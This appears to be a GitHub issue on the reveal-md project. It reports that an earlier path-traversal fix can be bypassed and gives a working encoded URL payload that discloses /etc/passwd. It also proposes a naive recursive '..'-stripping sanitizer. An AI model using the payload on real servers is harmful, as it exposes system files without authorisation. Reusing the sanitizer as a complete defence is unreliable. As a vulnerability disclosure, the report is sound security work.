Patch for issue#409 is not sufficient and the protection can be bypassed by an attacker

[W0rty]

Step to reproduce :

• git clone https://github.com/webpro/reveal-md
• cd reveal-md && sudo docker build -t revealmd .
• sudo docker run --rm -p 1948:1948 -p 35729:35729 -v $PWD/demo/:/slides webpronl/reveal-md:latest /slides --watch

Then open your browser and reach the following URL : http://localhost:1948/a.md/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc.md%2F..%2Fetc%2Fpasswd#/

The content of the file /etc/passwd is disclosed.

I have a patch for it on the file lib/render.js :

function sanitize(entry)
{
  if(entry.includes(".."))
  {
    entry = sanitize(entry.replace("..",""))
  }
  return entry
}

module.exports = async (req, res) => {
  const dir = await getInitialDir();
  console.log(sanitize(decodeURIComponent(req.url)))
  const filePath = path.join(dir, sanitize(decodeURIComponent(req.url)).replace(/\?.*/, ''));
  const markup = await renderFile(filePath);
  res.send(markup);
};

[webpro]

Thanks @W0rty, please open a PR if you have a patch